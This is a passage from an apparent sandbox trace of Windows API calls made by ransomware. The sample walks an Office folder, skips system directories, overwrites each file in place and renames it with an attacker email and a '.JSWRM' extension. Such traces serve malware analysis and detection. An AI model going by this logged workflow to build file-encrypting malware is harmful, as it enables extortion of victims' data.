lpOverlapped=0x0) returned 1 [0129.978] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.978] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0129.978] CloseHandle (hObject=0x314) returned 1 [0129.978] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\OOFL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\oofl.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\OOFL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\oofl.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.979] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb43bdd5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb43bdd5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb43bdd5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="OOFS.ICO", cAlternateFileName="")) returned 1 [0129.979] lstrcmpiW (lpString1="OOFS.ICO", lpString2=".") returned 1 [0129.979] lstrcmpiW (lpString1="OOFS.ICO", lpString2="..") returned 1 [0129.979] lstrcmpiW (lpString1="OOFS.ICO", lpString2="...") returned 1 [0129.979] lstrcmpiW (lpString1="OOFS.ICO", lpString2="windows") returned -1 [0129.979] lstrcmpiW (lpString1="OOFS.ICO", lpString2="recovery") returned -1 [0129.979] lstrcmpiW (lpString1="OOFS.ICO", lpString2="perflogs") returned -1 [0129.979] lstrcmpiW (lpString1="OOFS.ICO", lpString2="documents and settings") returned 1 [0129.979] lstrcmpiW (lpString1="OOFS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.979] lstrcmpiW (lpString1="OOFS.ICO", lpString2="system volume information") returned -1 [0129.979] lstrcmpiW (lpString1="OOFS.ICO", lpString2="msocache") returned 1 [0129.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OOFS.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OOFS.ICO", cchWideChar=8, lpMultiByteStr=0x345e870, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OOFS.ICO", lpUsedDefaultChar=0x0) returned 8 [0129.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OOFS.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OOFS.ICO", cchWideChar=8, lpMultiByteStr=0x345e840, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OOFS.ICO", lpUsedDefaultChar=0x0) returned 8 [0129.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\OOFS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\oofs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.983] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0129.983] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.983] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0129.984] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.985] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0129.985] CloseHandle (hObject=0x314) returned 1 [0129.985] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\OOFS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\oofs.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\OOFS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\oofs.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.986] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb43bdd5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb43bdd5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb43bdd5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x33c, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="OOFTMPL.CFG", cAlternateFileName="")) returned 1 [0129.986] lstrcmpiW (lpString1="OOFTMPL.CFG", lpString2=".") returned 1 [0129.986] lstrcmpiW (lpString1="OOFTMPL.CFG", lpString2="..") returned 1 [0129.986] lstrcmpiW (lpString1="OOFTMPL.CFG", lpString2="...") returned 1 [0129.986] lstrcmpiW (lpString1="OOFTMPL.CFG", lpString2="windows") returned -1 [0129.986] lstrcmpiW (lpString1="OOFTMPL.CFG", lpString2="recovery") returned -1 [0129.986] lstrcmpiW (lpString1="OOFTMPL.CFG", lpString2="perflogs") returned -1 [0129.986] lstrcmpiW (lpString1="OOFTMPL.CFG", lpString2="documents and settings") returned 1 [0129.986] lstrcmpiW (lpString1="OOFTMPL.CFG", lpString2="$RECYCLE.BIN") returned 1 [0129.986] lstrcmpiW (lpString1="OOFTMPL.CFG", lpString2="system volume information") returned -1 [0129.986] lstrcmpiW (lpString1="OOFTMPL.CFG", lpString2="msocache") returned 1 [0129.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OOFTMPL.CFG", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OOFTMPL.CFG", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OOFTMPL.CFG", lpUsedDefaultChar=0x0) returned 11 [0129.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OOFTMPL.CFG", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OOFTMPL.CFG", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OOFTMPL.CFG", lpUsedDefaultChar=0x0) returned 11 [0129.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\OOFTMPL.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\ooftmpl.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.987] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=828) returned 1 [0129.987] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.988] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x330, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x330, lpOverlapped=0x0) returned 1 [0129.989] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.989] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x330, lpOverlapped=0x0) returned 1 [0129.989] CloseHandle (hObject=0x314) returned 1 [0129.989] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\OOFTMPL.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\ooftmpl.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\OOFTMPL.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\ooftmpl.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.990] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb43bdd5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb43bdd5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb43bdd5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x309, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="POST.CFG", cAlternateFileName="")) returned 1 [0129.990] lstrcmpiW (lpString1="POST.CFG", lpString2=".") returned 1 [0129.990] lstrcmpiW (lpString1="POST.CFG", lpString2="..") returned 1 [0129.990] lstrcmpiW (lpString1="POST.CFG", lpString2="...") returned 1 [0129.990] lstrcmpiW (lpString1="POST.CFG", lpString2="windows") returned -1 [0129.990] lstrcmpiW (lpString1="POST.CFG", lpString2="recovery") returned -1 [0129.990] lstrcmpiW (lpString1="POST.CFG", lpString2="perflogs") returned 1 [0129.990] lstrcmpiW (lpString1="POST.CFG", lpString2="documents and settings") returned 1 [0129.990] lstrcmpiW (lpString1="POST.CFG", lpString2="$RECYCLE.BIN") returned 1 [0129.990] lstrcmpiW (lpString1="POST.CFG", lpString2="system volume information") returned -1 [0129.990] lstrcmpiW (lpString1="POST.CFG", lpString2="msocache") returned 1 [0129.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POST.CFG", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POST.CFG", cchWideChar=8, lpMultiByteStr=0x345e870, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POST.CFG", lpUsedDefaultChar=0x0) returned 8 [0129.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POST.CFG", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POST.CFG", cchWideChar=8, lpMultiByteStr=0x345e840, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POST.CFG", lpUsedDefaultChar=0x0) returned 8 [0129.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\POST.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\post.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.991] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=777) returned 1 [0129.991] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.991] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x300, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x300, lpOverlapped=0x0) returned 1 [0129.993] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.993] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x300, lpOverlapped=0x0) returned 1 [0129.993] CloseHandle (hObject=0x314) returned 1 [0129.993] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\POST.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\post.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\POST.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\post.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.994] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x309, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="POSTIT.CFG", cAlternateFileName="")) returned 1 [0129.994] lstrcmpiW (lpString1="POSTIT.CFG", lpString2=".") returned 1 [0129.994] lstrcmpiW (lpString1="POSTIT.CFG", lpString2="..") returned 1 [0129.994] lstrcmpiW (lpString1="POSTIT.CFG", lpString2="...") returned 1 [0129.994] lstrcmpiW (lpString1="POSTIT.CFG", lpString2="windows") returned -1 [0129.994] lstrcmpiW (lpString1="POSTIT.CFG", lpString2="recovery") returned -1 [0129.994] lstrcmpiW (lpString1="POSTIT.CFG", lpString2="perflogs") returned 1 [0129.994] lstrcmpiW (lpString1="POSTIT.CFG", lpString2="documents and settings") returned 1 [0129.994] lstrcmpiW (lpString1="POSTIT.CFG", lpString2="$RECYCLE.BIN") returned 1 [0129.994] lstrcmpiW (lpString1="POSTIT.CFG", lpString2="system volume information") returned -1 [0129.994] lstrcmpiW (lpString1="POSTIT.CFG", lpString2="msocache") returned 1 [0129.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTIT.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTIT.CFG", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POSTIT.CFG", lpUsedDefaultChar=0x0) returned 10 [0129.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTIT.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTIT.CFG", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POSTIT.CFG", lpUsedDefaultChar=0x0) returned 10 [0129.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\POSTIT.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\postit.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.995] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=777) returned 1 [0129.995] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.995] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x300, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x300, lpOverlapped=0x0) returned 1 [0129.997] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.997] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x300, lpOverlapped=0x0) returned 1 [0129.997] CloseHandle (hObject=0x314) returned 1 [0129.997] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\POSTIT.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\postit.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\POSTIT.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\postit.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.998] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="POSTITL.ICO", cAlternateFileName="")) returned 1 [0129.998] lstrcmpiW (lpString1="POSTITL.ICO", lpString2=".") returned 1 [0129.998] lstrcmpiW (lpString1="POSTITL.ICO", lpString2="..") returned 1 [0129.998] lstrcmpiW (lpString1="POSTITL.ICO", lpString2="...") returned 1 [0129.998] lstrcmpiW (lpString1="POSTITL.ICO", lpString2="windows") returned -1 [0129.998] lstrcmpiW (lpString1="POSTITL.ICO", lpString2="recovery") returned -1 [0129.998] lstrcmpiW (lpString1="POSTITL.ICO", lpString2="perflogs") returned 1 [0129.998] lstrcmpiW (lpString1="POSTITL.ICO", lpString2="documents and settings") returned 1 [0129.998] lstrcmpiW (lpString1="POSTITL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.998] lstrcmpiW (lpString1="POSTITL.ICO", lpString2="system volume information") returned -1 [0129.998] lstrcmpiW (lpString1="POSTITL.ICO", lpString2="msocache") returned 1 [0129.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTITL.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTITL.ICO", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POSTITL.ICO", lpUsedDefaultChar=0x0) returned 11 [0129.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTITL.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTITL.ICO", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POSTITL.ICO", lpUsedDefaultChar=0x0) returned 11 [0129.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.999] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\POSTITL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\postitl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.000] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0130.000] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.000] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0130.001] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.002] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0130.002] CloseHandle (hObject=0x314) returned 1 [0130.002] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\POSTITL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\postitl.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\POSTITL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\postitl.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.003] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="POSTITS.ICO", cAlternateFileName="")) returned 1 [0130.003] lstrcmpiW (lpString1="POSTITS.ICO", lpString2=".") returned 1 [0130.003] lstrcmpiW (lpString1="POSTITS.ICO", lpString2="..") returned 1 [0130.003] lstrcmpiW (lpString1="POSTITS.ICO", lpString2="...") returned 1 [0130.003] lstrcmpiW (lpString1="POSTITS.ICO", lpString2="windows") returned -1 [0130.003] lstrcmpiW (lpString1="POSTITS.ICO", lpString2="recovery") returned -1 [0130.003] lstrcmpiW (lpString1="POSTITS.ICO", lpString2="perflogs") returned 1 [0130.003] 